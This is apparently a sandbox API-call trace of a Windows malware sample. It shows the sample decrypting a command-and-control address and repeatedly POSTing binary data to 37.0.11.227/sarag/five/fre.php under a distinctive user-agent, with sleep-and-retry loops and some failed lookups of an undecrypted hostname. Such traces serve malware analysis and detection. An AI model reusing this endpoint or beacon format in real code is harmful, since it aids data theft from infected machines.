[0203.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.429] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.431] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.431] GetProcessHeap () returned 0x690000 [0203.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0203.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.433] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.434] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0203.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.435] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0203.435] GetProcessHeap () returned 0x690000 [0203.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0203.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.437] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0203.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.438] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0203.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0203.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.442] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0203.442] GetProcessHeap () returned 0x690000 [0203.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0203.442] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0203.442] GetProcessHeap () returned 0x690000 [0203.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0203.442] socket (af=2, type=1, protocol=6) returned 0x460 [0203.443] connect (s=0x460, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0203.475] FreeAddrInfoW (pAddrInfo=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0203.475] GetProcessHeap () returned 0x690000 [0203.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0203.476] GetProcessHeap () returned 0x690000 [0203.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b37c0 [0203.476] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.477] wvsprintfA (in: param_1=0x6b37c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.477] GetProcessHeap () returned 0x690000 [0203.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0203.477] GetProcessHeap () returned 0x690000 [0203.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.478] GetProcessHeap () returned 0x690000 [0203.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0203.478] GetProcessHeap () returned 0x690000 [0203.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b37c0 [0203.478] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.479] wvsprintfA (in: param_1=0x6b37c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.479] GetProcessHeap () returned 0x690000 [0203.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0203.479] GetProcessHeap () returned 0x690000 [0203.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.480] send (s=0x460, buf=0x6abd08*, len=242, flags=0) returned 242 [0203.480] send (s=0x460, buf=0x6aba40*, len=159, flags=0) returned 159 [0203.480] GetProcessHeap () returned 0x690000 [0203.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0203.480] recv (in: s=0x460, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0203.569] GetProcessHeap () returned 0x690000 [0203.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.570] GetProcessHeap () returned 0x690000 [0203.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.570] GetProcessHeap () returned 0x690000 [0203.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0203.570] GetProcessHeap () returned 0x690000 [0203.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0203.571] closesocket (s=0x460) returned 0 [0203.572] GetProcessHeap () returned 0x690000 [0203.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0203.572] GetProcessHeap () returned 0x690000 [0203.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0203.572] GetProcessHeap () returned 0x690000 [0203.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.572] GetProcessHeap () returned 0x690000 [0203.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0203.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd3c) returned 0x460 [0203.575] Sleep (dwMilliseconds=0xea60) [0203.577] GetProcessHeap () returned 0x690000 [0203.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0203.600] GetProcessHeap () returned 0x690000 [0203.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0203.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.608] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.609] GetProcessHeap () returned 0x690000 [0203.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0203.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.611] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.612] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.613] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0203.613] GetProcessHeap () returned 0x690000 [0203.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0203.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.614] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.615] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.616] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.619] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.622] GetProcessHeap () returned 0x690000 [0203.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0203.622] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.622] GetProcessHeap () returned 0x690000 [0203.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0203.623] GetProcessHeap () returned 0x690000 [0203.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.623] GetProcessHeap () returned 0x690000 [0203.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.624] GetProcessHeap () returned 0x690000 [0203.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0203.645] GetProcessHeap () returned 0x690000 [0203.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0203.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.646] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.647] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.651] GetProcessHeap () returned 0x690000 [0203.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0203.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.652] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.653] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.654] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0203.654] GetProcessHeap () returned 0x690000 [0203.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0203.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.655] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0203.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0203.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0203.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.659] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0203.659] GetProcessHeap () returned 0x690000 [0203.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0203.659] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad7e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0203.659] GetProcessHeap () returned 0x690000 [0203.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0203.659] socket (af=2, type=1, protocol=6) returned 0x464 [0203.661] connect (s=0x464, name=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0203.706] FreeAddrInfoW (pAddrInfo=0x6ad7e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0203.706] GetProcessHeap () returned 0x690000 [0203.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0203.707] GetProcessHeap () returned 0x690000 [0203.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b37c0 [0203.707] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.709] wvsprintfA (in: param_1=0x6b37c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.709] GetProcessHeap () returned 0x690000 [0203.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0203.709] GetProcessHeap () returned 0x690000 [0203.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.709] GetProcessHeap () returned 0x690000 [0203.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0203.709] GetProcessHeap () returned 0x690000 [0203.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b37c0 [0203.710] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.711] wvsprintfA (in: param_1=0x6b37c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.711] GetProcessHeap () returned 0x690000 [0203.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0203.711] GetProcessHeap () returned 0x690000 [0203.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.711] send (s=0x464, buf=0x6abd08*, len=242, flags=0) returned 242 [0203.712] send (s=0x464, buf=0x6aba40*, len=159, flags=0) returned 159 [0203.712] GetProcessHeap () returned 0x690000 [0203.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0203.712] recv (in: s=0x464, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0203.837] GetProcessHeap () returned 0x690000 [0203.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0203.837] GetProcessHeap () returned 0x690000 [0203.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.838] GetProcessHeap () returned 0x690000 [0203.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0203.842] GetProcessHeap () returned 0x690000 [0203.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0203.842] closesocket (s=0x464) returned 0 [0203.843] GetProcessHeap () returned 0x690000 [0203.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0203.843] GetProcessHeap () returned 0x690000 [0203.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0203.844] GetProcessHeap () returned 0x690000 [0203.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0203.844] GetProcessHeap () returned 0x690000 [0203.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0203.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x720) returned 0x464 [0203.846] Sleep (dwMilliseconds=0xea60) [0203.848] GetProcessHeap () returned 0x690000 [0203.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0203.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.849] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0203.871] GetProcessHeap () returned 0x690000 [0203.871] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0203.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.872] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.874] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.874] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.874] GetProcessHeap () returned 0x690000 [0203.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0203.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.876] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0203.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.877] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.878] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0203.878] GetProcessHeap () returned 0x690000 [0203.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0203.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.879] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.880] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.881] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.881] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.881] GetProcessHeap () returned 0x690000 [0203.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0203.882] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.884] GetProcessHeap () returned 0x690000 [0203.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0203.885] GetProcessHeap () returned 0x690000 [0203.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0203.885] GetProcessHeap () returned 0x690000 [0203.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0203.885] GetProcessHeap () returned 0x690000 [0203.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0203.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0203.899] GetProcessHeap () returned 0x690000 [0203.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0203.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.900] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0203.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.901] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.902] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.902] GetProcessHeap () returned 0x690000 [0203.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0203.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.906] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0203.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.907] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0203.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0203.908] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0203.908] GetProcessHeap () returned 0x690000 [0203.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0203.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.909] StrStrA 